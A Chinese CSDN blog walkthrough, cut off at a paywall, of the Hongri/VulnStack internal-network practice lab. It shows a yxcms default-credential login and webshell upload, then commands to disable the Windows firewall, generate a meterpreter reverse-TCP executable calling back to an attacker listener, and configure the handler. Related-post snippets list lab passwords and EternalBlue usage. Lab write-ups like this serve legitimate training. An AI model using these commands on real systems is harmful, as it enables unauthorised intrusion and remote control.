内网域渗透总结——红日靶场①_红日靶机账号密码

最新推荐文章于 2024-05-05 03:54:20 发布
最新推荐文章于 2024-05-05 03:54:20 发布
阅读量415 收藏 3
点赞数 5
分类专栏: 2024年程序员学习 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83621784/article/details/137673316
版权 
#发现目标存在yxcms,尝试访问
#在首页发现了后台地址和管理员账密

进入yxcms后台
#网址输入:http://192.168.43.17/yxcms/index.php?r=admin
#admin 
#123456

利用文件上传

蚁剑连接
#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default

​​

#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php



至此,已经拿到Webshell

三、后渗透

后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。

蚁剑终端关闭win7防火墙
#关闭win防火墙
netsh advfirewall set allprofiles state off 
#查看防火墙配置状态
netsh advfirewall show allprofile state

msf生成exe并开启监听
#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe 

#蚁剑上传233.exe
#蚁剑终端运行233.exe

#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp 
set lhos
最低0.47元/天 解锁文章
2401_83621784
关注
专栏目录
内网渗透文档过程有截图
07-02
本资源总结内网渗透测试的整个过程,从设置虚拟机网络环境到生成 payload 并进行渗透测试。下面是本资源中所涉及的知识点: 1. 虚拟机网络环境设置:在 VMware 中设置虚拟机网络环境,使用桥接模式模拟公网,桥...
内网渗透总结红日靶场一)
未完成的歌~的博客
04-11 6524
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
Vulnstack红日安全内网渗透靶场1实战
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
红日安全靶场(一)学习笔记
qq_45244158的博客
09-22 2272
红日安全靶场(一)学习笔记
红日靶场搭建
weixin_60362505的博客
11-15 2280
红日1靶场环境搭建
内网渗透思维导图指北
10-04
内网渗透思维导图指北
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
domainTools:内网渗透小工具
03-20
我的C ++学习过程-编写的渗透小工具 0x01。 NetLocalGroupGetMembers 功能:查询目标服务器本地管理组的成员 0x02。 NetLocalGroupEnum 功能:返回指定服务器上的所有本地组 0x03。 NetGroupGetUsers 功能:...
账号管理工具
12-21
账号管理工具,管理网账号网账号管理工具,管理网账号网账号管理工具,管理网账号网账号管理工具,管理网账号
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
最新发布
2401_84264244的博客
05-05 406
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
内网渗透——红日靶机学习(一)
jammny
11-13 6326
前言 开启内网学习,渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(控):192.168.52.138 WIN2003(成员):192.168.52.141 渗透测试 一、外网打点 信息收..
ATT&CK 红日2靶机渗透攻略
weixin_47311099的博客
01-27 5841
环境准备 红日靶场一下载地址 :http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶机通用密码:1qaz@WSX dc:win2012 web:win2008 初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去,并且登进去后启动C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.bat 启动时需要管理员身份(administ
红日-VulnStack靶场-ATT&CK(二)
braty_的博客
10-01 971
红日二,cs横向移动
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
遇事不决冲冲冲
12-25 1万+
一.介绍 vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019 整体思路 信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃
ATT&CK实战系列——红队实战(一)红日靶场1
qq_62989306的博客
10-17 3564
靶场搭建、外网打点getshell、上线MSF和CS、内网信息搜集、内网攻击。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机下载完成后解压,使用vmware打开虚拟机,有三台虚拟机:Win7、Win2003、Win2008默认密码hongrisec@2019
完整的渗透测试靶场通关
NZXHJ的博客
07-15 2646
记录一次比较系统的内网渗透靶场通关的文章
yxcms弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 2097
yxcms弱口令至getshell 漏洞复现
ATT&CK 红日4靶机渗透攻略
weixin_47311099的博客
01-27 3686
下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 环境搭建 ​ IP地址为dhcp获取 ubuntu:ubuntu 成员机器 douser:Dotest123 DC: administrator:Test2008 登陆后要改密码 !qaz2008 ​ 网络环境 DC : 192.168.75.132 VMNET1 (网卡改为自动获取ip) ​ WIN7: 192.168.75.130 VMNET1 ​ UBAUNTU: 192.168
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值